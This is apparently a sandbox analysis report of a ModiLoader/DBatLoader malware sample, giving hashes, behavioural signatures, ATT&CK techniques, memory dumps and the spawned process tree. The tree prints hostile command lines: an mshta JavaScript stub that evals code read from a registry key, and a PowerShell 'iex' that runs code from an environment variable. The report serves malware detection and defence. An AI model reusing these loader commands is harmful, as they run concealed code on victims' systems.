Analysis

  • max time kernel
    203s
  • max time network
    219s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-08-2022 04:24

General

  • Target

    5a3294a4c4fc2c8dd97d8397b0ec354213b02828390093b626a19ad47d6be2d5.exe

  • Size

    404KB

  • MD5

    6e39c75f1defb2020783df539a05c327

  • SHA1

    e899ef1ade27bcbc4479c0bea01c586b8ac9d1b1

  • SHA256

    5a3294a4c4fc2c8dd97d8397b0ec354213b02828390093b626a19ad47d6be2d5

  • SHA512

    c5d84f0d351eae549389403fcc88a7d731031888c2033fc3cf6f6eb685209dca78c2f34002b4afcfeaf495736b5ed08b93c544debefeeb7d63b0ee9ca61179de

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5a3294a4c4fc2c8dd97d8397b0ec354213b02828390093b626a19ad47d6be2d5.exe
    "C:\Users\Admin\AppData\Local\Temp\5a3294a4c4fc2c8dd97d8397b0ec354213b02828390093b626a19ad47d6be2d5.exe"
    1⤵
      PID:2316
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:NB3cIfj6="xqwChfB";Dr4=new%20ActiveXObject("WScript.Shell");RSwKb99X="BH10R5Mbo";jaP62y=Dr4.RegRead("HKLM\\software\\Wow6432Node\\0S5yfoCyQU\\qe91LR8a3s");qjoQn1YFr="eskwi2";eval(jaP62y);i9TtVcKIG="mRkV0j";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:khoesboo
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1804

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1804-140-0x00000000057E0000-0x0000000005846000-memory.dmp
      Filesize

      408KB

    • memory/1804-144-0x0000000006A80000-0x0000000006A9A000-memory.dmp
      Filesize

      104KB

    • memory/1804-143-0x0000000007DE0000-0x000000000845A000-memory.dmp
      Filesize

      6.5MB

    • memory/1804-142-0x0000000006580000-0x000000000659E000-memory.dmp
      Filesize

      120KB

    • memory/1804-135-0x0000000000000000-mapping.dmp
    • memory/1804-136-0x0000000002DF0000-0x0000000002E26000-memory.dmp
      Filesize

      216KB

    • memory/1804-141-0x0000000005990000-0x00000000059F6000-memory.dmp
      Filesize

      408KB

    • memory/1804-138-0x0000000005B30000-0x0000000006158000-memory.dmp
      Filesize

      6.2MB

    • memory/1804-139-0x0000000005730000-0x0000000005752000-memory.dmp
      Filesize

      136KB

    • memory/2316-134-0x0000000002A60000-0x0000000002B8D000-memory.dmp
      Filesize

      1.2MB

    • memory/2316-137-0x0000000000060000-0x0000000000120000-memory.dmp
      Filesize

      768KB

    • memory/2316-130-0x0000000002A60000-0x0000000002B8D000-memory.dmp
      Filesize

      1.2MB

    • memory/2316-132-0x0000000000060000-0x0000000000120000-memory.dmp
      Filesize

      768KB

    • memory/2316-131-0x0000000000400000-0x000000000046B000-memory.dmp
      Filesize

      428KB